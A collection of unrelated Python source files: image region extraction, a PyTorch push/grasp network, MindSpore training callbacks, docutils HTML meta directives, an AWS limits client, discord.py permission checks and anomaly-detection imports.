def extract(self, params: Dict[str, Any]) -> None:
self.log.info("Extracting wedges ... ")
self.block.clean()
regions_prev = self.block.get(Field.IMAGES_COORDS_BOW)
regions = self.extract_wedges(params["wedge"])
regions = update_translate(regions, using=regions_prev)
self.block.save(regions, Field.IMAGES_COORDS_BOW)
self.log.info("Extracting wedges complete.")
def extract_wedges(self, params: Dict[str, Any]) -> DataFrame:
output_order = self.project.config["output_order"]
settings = {
"samples": self.block.samples,
"devices": self.project.config["devices"],
"coords": self.block.get(Field.IMAGES_COORDS),
"angles": self.block.get(Field.ANGLES_COARSE),
}
regions = []
regions_to_extract = get_extraction_sequence(settings)
for region in regions_to_extract:
src = region["src"]
dst = get_filepath(Step.S1, region["fields"], output_order)
props = extract_image(src, dst, {**params, **region["params"]})
regions.append(
{
**region["fields"],
**{
"relpath": dst,
"origin_x": props["oxy"][0],
"origin_y": props["oxy"][1],
"center_x": props["cxy"][0],
"center_y": props["cxy"][1],
"well_x": props["wxy"][0],
"well_y": props["wxy"][1],
"mpp": props["mpp"],
"width": props["dims"][0],
"height": props["dims"][1],
"metadata": json.dumps({}),
},
}
)
columns = [
"relpath",
"project",
"block",
"panel",
"level",
"sample",
"cohorts",
"drug",
"origin_x",
"origin_y",
"center_x",
"center_y",
"well_x",
"well_y",
"mpp",
"metadata",
]
regions = pandas.DataFrame(regions, columns=columns)
return regions
|
py | 7df8044d424e943a807e1fc1f0ffbfdd37ff5208 | #!/usr/bin/env python
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from networks import FeatureTunk
class reinforcement_net(nn.Module):
def __init__(self, use_cuda):
super(reinforcement_net, self).__init__()
self.use_cuda = use_cuda
# Initialize network trunks with DenseNet pre-trained on ImageNet
self.feature_tunk = FeatureTunk()
self.num_rotations = 16
# Construct network branches for pushing and grasping
self.pushnet = nn.Sequential(OrderedDict([
('push-norm0', nn.BatchNorm2d(1024)),
('push-relu0', nn.ReLU(inplace=True)),
('push-conv0', nn.Conv2d(1024, 128, kernel_size=3, stride=1, padding=1, bias=False)),
('push-norm1', nn.BatchNorm2d(128)),
('push-relu1', nn.ReLU(inplace=True)),
('push-conv1', nn.Conv2d(128, 32, kernel_size=1, stride=1, bias=False)),
('push-norm2', nn.BatchNorm2d(32)),
('push-relu2', nn.ReLU(inplace=True)),
('push-conv2', nn.Conv2d(32, 1, kernel_size=1, stride=1, bias=False))
]))
self.graspnet = nn.Sequential(OrderedDict([
('grasp-norm0', nn.BatchNorm2d(1024)),
('grasp-relu0', nn.ReLU(inplace=True)),
('grasp-conv0', nn.Conv2d(1024, 128, kernel_size=3, stride=1, padding=1, bias=False)),
('grasp-norm1', nn.BatchNorm2d(128)),
('grasp-relu1', nn.ReLU(inplace=True)),
('grasp-conv1', nn.Conv2d(128, 32, kernel_size=1, stride=1, bias=False)),
('grasp-norm2', nn.BatchNorm2d(32)),
('grasp-relu2', nn.ReLU(inplace=True)),
('grasp-conv2', nn.Conv2d(32, 1, kernel_size=1, stride=1, bias=False))
]))
# Initialize network weights
for m in self.named_modules():
if 'push-' in m[0] or 'grasp-' in m[0]:
if isinstance(m[1], nn.Conv2d):
nn.init.kaiming_normal_(m[1].weight.data)
elif isinstance(m[1], nn.BatchNorm2d):
m[1].weight.data.fill_(1)
m[1].bias.data.zero_()
# Initialize output variable (for backprop)
self.interm_feat = []
self.output_prob = []
def forward(self, input_color_data, input_depth_data, input_mask_data, is_volatile=False, specific_rotation=-1):
if is_volatile:
with torch.no_grad():
output_prob = []
# Apply rotations to images
for rotate_idx in range(self.num_rotations):
rotate_theta = np.radians(rotate_idx*(360/self.num_rotations))
# NOTES: affine_grid + grid_sample -> spatial transformer networks
# Compute sample grid for rotation BEFORE neural network
affine_mat_before = np.asarray([[np.cos(-rotate_theta), np.sin(-rotate_theta), 0],[-np.sin(-rotate_theta), np.cos(-rotate_theta), 0]])
affine_mat_before.shape = (2, 3, 1)
affine_mat_before = torch.from_numpy(affine_mat_before).permute(2,0,1).float()
if self.use_cuda:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False).cuda(), input_color_data.size())
else:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False), input_color_data.size())
# Rotate images clockwise
if self.use_cuda:
rotate_color = F.grid_sample(Variable(input_color_data).cuda(), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data).cuda(), flow_grid_before)
rotate_mask = F.grid_sample(Variable(input_mask_data).cuda(), flow_grid_before)
else:
rotate_color = F.grid_sample(Variable(input_color_data), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data), flow_grid_before)
rotate_mask = F.grid_sample(Variable(input_mask_data), flow_grid_before)
# Compute intermediate features
interm_feat = self.feature_tunk(rotate_color, rotate_depth, rotate_mask)
# Forward pass through branches
push_out = self.pushnet(interm_feat)
grasp_out = self.graspnet(interm_feat)
# Compute sample grid for rotation AFTER branches
affine_mat_after = np.asarray([[np.cos(rotate_theta), np.sin(rotate_theta), 0], [-np.sin(rotate_theta), np.cos(rotate_theta), 0]])
affine_mat_after.shape = (2, 3, 1)
affine_mat_after = torch.from_numpy(affine_mat_after).permute(2, 0, 1).float()
if self.use_cuda:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False).cuda(), push_out.data.size())
else:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False), grasp_out.data.size())
# Forward pass through branches, undo rotation on output predictions, upsample results
output_prob.append([F.interpolate(F.grid_sample(push_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True),
F.interpolate(F.grid_sample(grasp_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True)])
return output_prob, interm_feat
else:
self.output_prob = []
# Apply rotations to intermediate features
# for rotate_idx in range(self.num_rotations):
rotate_idx = specific_rotation
rotate_theta = np.radians(rotate_idx*(360/self.num_rotations))
# Compute sample grid for rotation BEFORE branches
affine_mat_before = np.asarray([[np.cos(-rotate_theta), np.sin(-rotate_theta), 0],[-np.sin(-rotate_theta), np.cos(-rotate_theta), 0]])
affine_mat_before.shape = (2, 3, 1)
affine_mat_before = torch.from_numpy(affine_mat_before).permute(2,0,1).float()
if self.use_cuda:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False).cuda(), input_color_data.size())
else:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False), input_color_data.size())
# Rotate images clockwise
if self.use_cuda:
rotate_color = F.grid_sample(Variable(input_color_data, requires_grad=False).cuda(), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data, requires_grad=False).cuda(), flow_grid_before)
rotate_mask = F.grid_sample(Variable(input_mask_data, requires_grad=False).cuda(), flow_grid_before)
else:
rotate_color = F.grid_sample(Variable(input_color_data, requires_grad=False), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data, requires_grad=False), flow_grid_before)
rotate_mask = F.grid_sample(Variable(input_mask_data, requires_grad=False), flow_grid_before)
# Compute intermediate features
self.interm_feat = self.feature_tunk(rotate_color, rotate_depth, rotate_mask)
# Forward pass through branches
push_out = self.pushnet(self.interm_feat)
grasp_out = self.graspnet(self.interm_feat)
# Compute sample grid for rotation AFTER branches
affine_mat_after = np.asarray([[np.cos(rotate_theta), np.sin(rotate_theta), 0], [-np.sin(rotate_theta), np.cos(rotate_theta), 0]])
affine_mat_after.shape = (2, 3, 1)
affine_mat_after = torch.from_numpy(affine_mat_after).permute(2, 0, 1).float()
if self.use_cuda:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False).cuda(), push_out.data.size())
else:
flow_grid_after = F.affine_grid(Variable(affine_mat_after, requires_grad=False), push_out.data.size())
# Forward pass through branches, undo rotation on output predictions, upsample results
self.output_prob.append([F.interpolate(F.grid_sample(push_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True),
F.interpolate(F.grid_sample(grasp_out, flow_grid_after), scale_factor=16, mode='bilinear', align_corners=True)])
return self.output_prob, self.interm_feat
|
py | 7df804af0f0eca1a3d871d9b0ee7d92fee0d9a81 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Callback related classes and functions."""
import os
import stat
import shutil
import time
import numpy as np
import mindspore.context as context
from mindspore.train.serialization import _exec_save_checkpoint, _fill_param_into_net, _save_graph
from mindspore.train._utils import _make_directory
from mindspore import log as logger
from mindspore._checkparam import check_int_non_negative, check_bool
from mindspore.common.tensor import Tensor
from mindspore.train.summary.summary_record import _cache_summary_tensor_data
_cur_dir = os.getcwd()
_cur_net = None
_save_dir = _cur_dir
class _CheckpointManager:
"""Manage checkpoint files according to train_config of checkpoint."""
def __init__(self):
self._ckpoint_filelist = []
@property
def ckpoint_filelist(self):
"""Get all the related checkpoint files managed here."""
return self._ckpoint_filelist
@property
def ckpoint_num(self):
"""Get the number of the related checkpoint files managed here."""
return len(self._ckpoint_filelist)
def update_ckpoint_filelist(self, directory, prefix):
"""Update the checkpoint file list."""
self._ckpoint_filelist = []
files = os.listdir(directory)
for filename in files:
if os.path.splitext(filename)[-1] == ".ckpt" and filename.startswith(prefix):
mid_name = filename[len(prefix):-5]
flag = True
for char in mid_name:
if char.isalpha():
flag = False
if flag:
self._ckpoint_filelist.append(directory + '/' + filename)
def remove_ckpoint_file(self, file_name):
"""Remove the specified checkpoint file from this checkpoint manager and also from the directory."""
try:
os.chmod(file_name, stat.S_IWRITE)
os.remove(file_name)
self._ckpoint_filelist.remove(file_name)
except OSError:
logger.warning("OSError, failed to remove the older ckpt file %s.", file_name)
except ValueError:
logger.warning("ValueError, failed to remove the older ckpt file %s.", file_name)
def remove_oldest_ckpoint_file(self):
"""Remove the oldest checkpoint file from this checkpoint manager and also from the directory."""
ckpoint_files = sorted(self._ckpoint_filelist, key=os.path.getmtime)
self.remove_ckpoint_file(ckpoint_files[0])
def keep_one_ckpoint_per_minutes(self, minutes, cur_time):
"""Only keep the latest one ckpt file per minutes, remove other files generated in [last_time, cur_time]."""
movs = []
oldest_file = ''
oldest_time = cur_time
for ck_file in self._ckpoint_filelist:
modify_time = os.path.getmtime(ck_file)
if cur_time - modify_time < 60 * minutes:
movs.append(ck_file)
if modify_time < oldest_time:
oldest_time = modify_time
oldest_file = ck_file
for mv_file in movs:
if mv_file == oldest_file:
continue
self.remove_ckpoint_file(mv_file)
def _check_file_name_prefix(file_name_prefix):
"""
Check file name valid or not.
File name can't include '/'. This file name naming convention only apply to Linux.
"""
if not isinstance(file_name_prefix, str) or file_name_prefix.find('/') >= 0:
return False
return True
def _chg_ckpt_file_name_if_same_exist(directory, prefix):
"""Check if there is a file with the same name."""
files = os.listdir(directory)
suffix_num = 0
pre_len = len(prefix)
for filename in files:
name_ext = os.path.splitext(filename)
if name_ext[-1] != ".ckpt":
continue
# find same prefix file
if filename.find(prefix) == 0 and not filename[pre_len].isalpha():
# add the max suffix + 1
index = filename[pre_len:].find("-")
if index == 0:
suffix_num = max(suffix_num, 1)
elif index != -1:
num = filename[pre_len+1:pre_len+index]
if num.isdigit():
suffix_num = max(suffix_num, int(num)+1)
if suffix_num != 0:
prefix = prefix + "_" + str(suffix_num)
return prefix
class CheckpointConfig:
"""
The config for model checkpoint.
Note:
During the training process, if dataset is transmitted through the data channel,
suggest set save_checkpoint_steps be an integer multiple of loop_size.
Otherwise there may be deviation in the timing of saving checkpoint.
Args:
save_checkpoint_steps (int): Steps to save checkpoint. Default: 1.
save_checkpoint_seconds (int): Seconds to save checkpoint. Default: 0.
Can't be used with save_checkpoint_steps at the same time.
keep_checkpoint_max (int): Maximum step to save checkpoint. Default: 5.
keep_checkpoint_per_n_minutes (int): Keep one checkpoint every n minutes. Default: 0.
Can't be used with keep_checkpoint_max at the same time.
integrated_save (bool): Whether to intergrated save in automatic model parallel scene. Default: True.
Integrated save function is only supported in automatic parallel scene, not supported in manual parallel.
Raises:
ValueError: If the input_param is None or 0.
Examples:
>>> config = CheckpointConfig()
>>> ckpoint_cb = ModelCheckpoint(prefix="ck_prefix", directory='./', config=config)
>>> model.train(10, dataset, callbacks=ckpoint_cb)
"""
def __init__(self,
save_checkpoint_steps=1,
save_checkpoint_seconds=0,
keep_checkpoint_max=5,
keep_checkpoint_per_n_minutes=0,
integrated_save=True):
if not save_checkpoint_steps and not save_checkpoint_seconds and \
not keep_checkpoint_max and not keep_checkpoint_per_n_minutes:
raise ValueError("The input_param can't be all None or 0")
if save_checkpoint_steps:
save_checkpoint_steps = check_int_non_negative(save_checkpoint_steps)
if save_checkpoint_seconds:
save_checkpoint_seconds = check_int_non_negative(save_checkpoint_seconds)
if keep_checkpoint_max:
keep_checkpoint_max = check_int_non_negative(keep_checkpoint_max)
if keep_checkpoint_per_n_minutes:
keep_checkpoint_per_n_minutes = check_int_non_negative(keep_checkpoint_per_n_minutes)
self._save_checkpoint_steps = save_checkpoint_steps
self._save_checkpoint_seconds = save_checkpoint_seconds
if self._save_checkpoint_steps and self._save_checkpoint_steps > 0:
self._save_checkpoint_seconds = None
self._keep_checkpoint_max = keep_checkpoint_max
self._keep_checkpoint_per_n_minutes = keep_checkpoint_per_n_minutes
if self._keep_checkpoint_max and self._keep_checkpoint_max > 0:
self._keep_checkpoint_per_n_minutes = None
else:
if not self._keep_checkpoint_per_n_minutes or self._keep_checkpoint_per_n_minutes == 0:
self._keep_checkpoint_max = 1
self._integrated_save = check_bool(integrated_save)
@property
def save_checkpoint_steps(self):
"""Get the value of _save_checkpoint_steps."""
return self._save_checkpoint_steps
@property
def save_checkpoint_seconds(self):
"""Get the value of _save_checkpoint_seconds."""
return self._save_checkpoint_seconds
@property
def keep_checkpoint_max(self):
"""Get the value of _keep_checkpoint_max."""
return self._keep_checkpoint_max
@property
def keep_checkpoint_per_n_minutes(self):
"""Get the value of _keep_checkpoint_per_n_minutes."""
return self._keep_checkpoint_per_n_minutes
@property
def integrated_save(self):
"""Get the value of _integrated_save."""
return self._integrated_save
def get_checkpoint_policy(self):
"""Get the policy of checkpoint."""
checkpoint_policy = {'save_checkpoint_steps': self._save_checkpoint_steps,
'save_checkpoint_seconds': self._save_checkpoint_seconds,
'keep_checkpoint_max': self._keep_checkpoint_max,
'keep_checkpoint_per_n_minutes': self._keep_checkpoint_per_n_minutes}
return checkpoint_policy
def _set_cur_net(net):
"""
Set current net for which we are using to save checkpoint.
Args:
net (Cell): train network
"""
global _cur_net
_cur_net = net
def _checkpoint_cb_for_save_op(parameter_list):
"""
The checkpoint callback function for MindSpore.
Will be executed by checkpoint save op.
Args:
parameter_list (list): Format is like [{"name",name},{"data",value}] and value type is Tensor.
Returns:
bool, true: means save checkpoint success.
"""
if _cur_net is None:
logger.warning("_cur_net is None. parameters are not updated.")
return False
logger.info("update parameters in the net.")
_fill_param_into_net(_cur_net, parameter_list)
_set_cur_net(None)
return True
def _summary_cb_for_save_op(summary_list):
"""
The summary callback function for MindSpore.
Will be executed by summary op.
Args:
summary_list (list): Format is like [{"name": tag_name, "data": tensor},...] and value is Scalar/Tensor.
Returns:
bool, true: means save summary success.
"""
ret = _cache_summary_tensor_data(summary_list)
return ret
def _build_callbacks(callbacks):
"""
Contain a list of callback.
Args:
callbacks (list): Callback functions list, Support None, a single Callback object, or a list.
Returns:
List, a list of callback functions.
"""
if callbacks:
if isinstance(callbacks, tuple):
raise TypeError("Callbacks cannot be a tuple. Please check it.")
if not isinstance(callbacks, list):
callbacks = [callbacks]
else:
callbacks = []
excute_callbacks = []
for cb in callbacks:
if cb is None or not isinstance(cb, Callback):
raise TypeError("Callback must inheriting base class Callback. Some callback is Wrong. Please check it.")
excute_callbacks.append(cb)
return _ListCallback(excute_callbacks)
class _ListCallback:
"""
Sequential execution of callback functions.
Execute Callback functions at certain points.
Args:
callbacks (list): Callback functions list.
"""
def __init__(self, callbacks):
super(_ListCallback, self).__init__()
self._callbacks = callbacks
def begin(self, run_context):
"""Called once before network training."""
for cb in self._callbacks:
cb.begin(run_context)
def epoch_begin(self, run_context):
"""Called before each epoch begin."""
for cb in self._callbacks:
cb.epoch_begin(run_context)
def epoch_end(self, run_context):
"""Called after each epoch finished."""
for cb in self._callbacks:
cb.epoch_end(run_context)
def step_begin(self, run_context):
"""Called before each epoch begin."""
for cb in self._callbacks:
cb.step_begin(run_context)
def step_end(self, run_context):
"""Called after each step finished."""
for cb in self._callbacks:
cb.step_end(run_context)
def end(self, run_context):
"""Called once after network training."""
for cb in self._callbacks:
cb.end(run_context)
class Callback:
"""
Abstract base class used to build a callback function.
Callback function will execution some operating to the current step or epoch.
Examples:
>>> class Print_info(Callback):
>>> def step_end(self, run_context):
>>> cb_params = run_context.original_args()
>>> print(cb_params.cur_epoch_num)
>>> print(cb_params.cur_step_num)
>>>
>>> print_cb = Print_info()
>>> model.train(epoch, dataset, callbacks=print_cb)
"""
def __init__(self):
pass
def begin(self, run_context):
"""
Called once before the network executing.
Args:
run_context (RunContext): Include some information of the model.
"""
def epoch_begin(self, run_context):
"""
Called before each epoch beginning.
Args:
run_context (RunContext): Include some information of the model.
"""
def epoch_end(self, run_context):
"""
Called after each epoch finished.
Args:
run_context (RunContext): Include some information of the model.
"""
def step_begin(self, run_context):
"""
Called before each epoch beginning.
Args:
run_context (RunContext): Include some information of the model.
"""
def step_end(self, run_context):
"""
Called after each step finished.
Args:
run_context (RunContext): Include some information of the model.
"""
def end(self, run_context):
"""
Called once after network training.
Args:
run_context (RunContext): Include some information of the model.
"""
class SummaryStep(Callback):
"""
The summary callback class.
Args:
summary (Object): Summary recode object.
flush_step (int): Number of interval steps to execute. Default: 10.
"""
def __init__(self, summary, flush_step=10):
super(SummaryStep, self).__init__()
if not isinstance(flush_step, int) or isinstance(flush_step, bool) or flush_step <= 0:
raise ValueError("`flush_step` should be int and greater than 0")
self._summary = summary
self._flush_step = flush_step
def step_end(self, run_context):
"""
Save summary.
Args:
run_context (RunContext): Context of the train running.
"""
cb_params = run_context.original_args()
if cb_params.cur_step_num % self._flush_step == 0:
self._summary.record(cb_params.cur_step_num, cb_params.train_network)
@property
def summary_file_name(self):
return self._summary.full_file_name
class _InternalCallbackParam(dict):
"""Internal callback object's parameters."""
def __getattr__(self, key):
return self[key]
def __setattr__(self, key, value):
self[key] = value
class RunContext:
"""
Provides information about the model.
Run call being made. Provides information about original request to model function.
callback objects can stop the loop by calling request_stop() of run_context.
Args:
original_args (dict): Holding the related information of model etc.
"""
def __init__(self, original_args):
if not isinstance(original_args, dict):
raise TypeError("The arg of RunContext should be dict type.")
self._original_args = original_args
self._stop_requested = False
def original_args(self):
"""
Get the _original_args object.
Returns:
Dict, a object holding the original arguments of model.
"""
return self._original_args
def request_stop(self):
"""
Sets stop requested during training.
Callbacks can use this function to request stop of iterations.
model.train() checks whether this is called or not.
"""
self._stop_requested = True
def get_stop_requested(self):
"""
Returns whether a stop is requested or not.
Returns:
bool, if true, model.train() stops iterations.
"""
return self._stop_requested
class ModelCheckpoint(Callback):
"""
The checkpoint callback class.
It is called to combine with train process and save the model and network parameters after traning.
Args:
prefix (str): Checkpoint files names prefix. Default: "CKP".
directory (str): Folder path into which checkpoint files will be saved. Default: None.
config (CheckpointConfig): Checkpoint strategy config. Default: None.
Raises:
ValueError: If the prefix is invalid.
TypeError: If the config is not CheckpointConfig type.
"""
def __init__(self, prefix='CKP', directory=None, config=None):
super(ModelCheckpoint, self).__init__()
self._latest_ckpt_file_name = ""
self._init_time = time.time()
self._last_time = time.time()
self._last_time_for_keep = time.time()
self._last_triggered_step = 0
if _check_file_name_prefix(prefix):
self._prefix = prefix
else:
raise ValueError("Prefix {} for checkpoint file name invalid, "
"please check and correct it and then continue.".format(prefix))
if directory:
self._directory = _make_directory(directory)
else:
self._directory = _cur_dir
if config is None:
self._config = CheckpointConfig()
else:
if not isinstance(config, CheckpointConfig):
raise TypeError("config should be CheckpointConfig type.")
self._config = config
# get existing checkpoint files
self._manager = _CheckpointManager()
self._prefix = _chg_ckpt_file_name_if_same_exist(self._directory, self._prefix)
self._graph_saved = False
def step_end(self, run_context):
"""
Save the checkpoint at the end of step.
Args:
run_context (RunContext): Context of the train running.
"""
cb_params = run_context.original_args()
# save graph (only once)
if not self._graph_saved:
graph_file_name = os.path.join(self._directory, self._prefix + '-graph.meta')
_save_graph(cb_params.train_network, graph_file_name)
self._graph_saved = True
self._save_ckpt(cb_params)
def end(self, run_context):
"""
Save the last checkpoint after training finished.
Args:
run_context (RunContext): Context of the train running.
"""
cb_params = run_context.original_args()
_to_save_last_ckpt = True
self._save_ckpt(cb_params, _to_save_last_ckpt)
from mindspore.parallel._cell_wrapper import destroy_allgather_cell
destroy_allgather_cell()
def _check_save_ckpt(self, cb_params, force_to_save):
"""Check whether save checkpoint files or not."""
if self._config.save_checkpoint_steps and self._config.save_checkpoint_steps > 0:
if cb_params.cur_step_num >= self._last_triggered_step + self._config.save_checkpoint_steps \
or force_to_save is True:
return True
elif self._config.save_checkpoint_seconds and self._config.save_checkpoint_seconds > 0:
self._cur_time = time.time()
if (self._cur_time - self._last_time) > self._config.save_checkpoint_seconds or force_to_save is True:
self._last_time = self._cur_time
return True
return False
def _save_ckpt(self, cb_params, force_to_save=False):
"""Save checkpoint files."""
if cb_params.cur_step_num == self._last_triggered_step:
return
save_ckpt = self._check_save_ckpt(cb_params, force_to_save)
step_num_in_epoch = (cb_params.cur_step_num - 1) % cb_params.batch_num + 1
if save_ckpt:
cur_ckpoint_file = self._prefix + "-" + str(cb_params.cur_epoch_num) + "_" \
+ str(step_num_in_epoch) + ".ckpt"
# update checkpoint file list.
self._manager.update_ckpoint_filelist(self._directory, self._prefix)
# keep checkpoint files number equal max number.
if self._config.keep_checkpoint_max and 0 < self._config.keep_checkpoint_max <= self._manager.ckpoint_num:
self._manager.remove_oldest_ckpoint_file()
elif self._config.keep_checkpoint_per_n_minutes and self._config.keep_checkpoint_per_n_minutes > 0:
self._cur_time_for_keep = time.time()
if (self._cur_time_for_keep - self._last_time_for_keep) \
< self._config.keep_checkpoint_per_n_minutes * 60:
self._manager.keep_one_ckpoint_per_minutes(self._config.keep_checkpoint_per_n_minutes,
self._cur_time_for_keep)
# generate the new checkpoint file and rename it.
global _save_dir
_save_dir = self._directory
cur_file = os.path.join(self._directory, cur_ckpoint_file)
tmp_ckpt_file_name_for_cur_process = str(os.getpid()) + "-" + 'parameters.ckpt'
gen_file = os.path.join(_save_dir, tmp_ckpt_file_name_for_cur_process)
self._last_time_for_keep = time.time()
self._last_triggered_step = cb_params.cur_step_num
if context.get_context("enable_ge"):
_set_cur_net(cb_params.train_network)
cb_params.train_network.exec_checkpoint_graph()
_exec_save_checkpoint(cb_params.train_network, gen_file, self._config.integrated_save)
if os.path.exists(gen_file):
shutil.move(gen_file, cur_file)
self._latest_ckpt_file_name = cur_file
@property
def latest_ckpt_file_name(self):
"""Return the latest checkpoint path and file name."""
return self._latest_ckpt_file_name
class LossMonitor(Callback):
"""
Monitor the loss in training.
If the loss is NAN or INF, it will terminate training.
Note:
If per_print_times is 0 do not print loss.
Args:
per_print_times (int): Print loss every times. Default: 1.
Raises:
ValueError: If print_step is not int or less than zero.
"""
def __init__(self, per_print_times=1):
super(LossMonitor, self).__init__()
if not isinstance(per_print_times, int) or per_print_times < 0:
raise ValueError("print_step must be int and >= 0.")
self._per_print_times = per_print_times
def step_end(self, run_context):
cb_params = run_context.original_args()
loss = cb_params.net_outputs
if isinstance(loss, (tuple, list)):
if isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray):
loss = loss[0]
if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray):
loss = np.mean(loss.asnumpy())
cur_step_in_epoch = (cb_params.cur_step_num - 1) % cb_params.batch_num + 1
if isinstance(loss, float) and (np.isnan(loss) or np.isinf(loss)):
raise ValueError("epoch: {} step: {}. Invalid loss, terminating training."
.format(cb_params.cur_epoch_num, cur_step_in_epoch))
if self._per_print_times != 0 and cb_params.cur_step_num % self._per_print_times == 0:
print("epoch: %s step: %s, loss is %s" % (cb_params.cur_epoch_num, cur_step_in_epoch, loss), flush=True)
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
epoch_mseconds = (time.time() - self.epoch_time) * 1000
per_step_mseconds = epoch_mseconds / self.data_size
print("epoch time: {0}, per step time: {1}".format(epoch_mseconds, per_step_mseconds), flush=True)
|
py | 7df80713817c4244fd13fa7744dca8a2beadc56e | # $Id: html.py 7320 2012-01-19 22:33:02Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Directives for typically HTML-specific constructs.
"""
__docformat__ = 'reStructuredText'
import sys
from docutils import nodes, utils
from docutils.parsers.rst import Directive
from docutils.parsers.rst import states
from docutils.transforms import components
class MetaBody(states.SpecializedBody):
class meta(nodes.Special, nodes.PreBibliographic, nodes.Element):
"""HTML-specific "meta" element."""
pass
def field_marker(self, match, context, next_state):
"""Meta element."""
node, blank_finish = self.parsemeta(match)
self.parent += node
return [], next_state, []
def parsemeta(self, match):
name = self.parse_field_marker(match)
indented, indent, line_offset, blank_finish = \
self.state_machine.get_first_known_indented(match.end())
node = self.meta()
pending = nodes.pending(components.Filter,
{'component': 'writer',
'format': 'html',
'nodes': [node]})
node['content'] = ' '.join(indented)
if not indented:
line = self.state_machine.line
msg = self.reporter.info(
'No content for meta tag "%s".' % name,
nodes.literal_block(line, line))
return msg, blank_finish
tokens = name.split()
try:
attname, val = utils.extract_name_value(tokens[0])[0]
node[attname.lower()] = val
except utils.NameValueError:
node['name'] = tokens[0]
for token in tokens[1:]:
try:
attname, val = utils.extract_name_value(token)[0]
node[attname.lower()] = val
except utils.NameValueError, detail:
line = self.state_machine.line
msg = self.reporter.error(
'Error parsing meta tag attribute "%s": %s.'
% (token, detail), nodes.literal_block(line, line))
return msg, blank_finish
self.document.note_pending(pending)
return pending, blank_finish
class Meta(Directive):
has_content = True
SMkwargs = {'state_classes': (MetaBody,)}
def run(self):
self.assert_has_content()
node = nodes.Element()
new_line_offset, blank_finish = self.state.nested_list_parse(
self.content, self.content_offset, node,
initial_state='MetaBody', blank_finish=True,
state_machine_kwargs=self.SMkwargs)
if (new_line_offset - self.content_offset) != len(self.content):
# incomplete parse of block?
error = self.state_machine.reporter.error(
'Invalid meta directive.',
nodes.literal_block(self.block_text, self.block_text),
line=self.lineno)
node += error
return node.children
|
py | 7df8072b1bc20e55d1e52f2b5c8f79da54d13330 | import logging
import boto3
logging.basicConfig()
logger = logging.getLogger()
ASG_INTERESTING_KEYS = ("NumberOfLaunchConfigurations",
"MaxNumberOfLaunchConfigurations",
"MaxNumberOfAutoScalingGroups",
"NumberOfAutoScalingGroups")
def handle_date(obj):
if hasattr(obj, 'isoformat'):
return obj.isoformat()
else:
raise TypeError
class botoclient(object):
def __init__(self, region):
self.region = region
self.ec2_limits = self.get_ec2_limits()
self.asg_limits = self.get_asg_limits()
def connect(self, service):
return boto3.client(service)
def parse_response(self, response, interesting_keys):
return dict((k, response[k]) for k in interesting_keys if k in response)
def get_asg_limits(self):
"""
Returns a dict containing the limits and current usage
"""
response = {}
c = self.connect("autoscaling")
limits = c.describe_account_limits()
return self.parse_response(limits, ASG_INTERESTING_KEYS)
def get_ec2_limits(self):
"""
Queries AWS to get a dict containing the account attributes
returns: dict
"""
c = self.connect("ec2")
limits = c.describe_account_attributes()
result = {}
for account_attribute in limits["AccountAttributes"]:
try:
result[account_attribute["AttributeName"]] = account_attribute["AttributeValues"][0]["AttributeValue"]
except (IndexError, KeyError) as e:
return None
return result
def get_running_ec2(self):
c = self.connect("ec2")
instances = c.describe_instances(Filters=[{
"Name":"instance-state-name",
"Values": ["running"]
}])
count = 0
for reservation in instances["Reservations"]:
count += len(reservation["Instances"])
return count
def get_current_usage(self):
usage = {}
usage["instances"] = {
"current": self.get_running_ec2(),
"limit": int(self.ec2_limits["max-instances"])
}
usage["autoscaling-groups"] = {
"current": self.asg_limits["NumberOfAutoScalingGroups"],
"limit": self.asg_limits["MaxNumberOfAutoScalingGroups"]
}
usage["launch-configurations"] = {
"current": self.asg_limits["NumberOfLaunchConfigurations"],
"limit": self.asg_limits["MaxNumberOfLaunchConfigurations"]
}
return usage
|
py | 7df807bf76dd16f337b060067b9bf952f0ca6a50 | from discord.ext import commands
from cogs.utils.errors import NotAContributorError
def is_cog_contributor():
"""Check if whoever used the command is in the bots contributors."""
async def predicate(ctx):
if str(ctx.author.id) in ctx.bot.contributors:
return True
else:
raise NotAContributorError(f"Command {ctx.command.name} raised an error: {str(ctx.author)} is not a contributor.")
return commands.check(predicate)
def is_in_guilds(*guild_ids):
"""Checks if the user who invoked the command is in X guilds."""
async def predicate(ctx):
guild = ctx.guild
if guild is None:
return False
return guild.id in guild_ids
return commands.check(predicate) |
py | 7df807d13f0525361cfbf16f272ab9632ceecbb9 | import numpy as np
import logging
from ..common.utils import get_command_args, configure_logger
from ..common.gen_samples import read_anomaly_dataset
from .aad_globals import (
IFOR_SCORE_TYPE_NEG_PATH_LEN, ENSEMBLE_SCORE_LINEAR, AAD_IFOREST, INIT_UNIF
)
from .data_stream import DataStream, IdServer
from .random_split_trees import TREE_UPD_INCREMENTAL
from .forest_aad_detector import AadForest
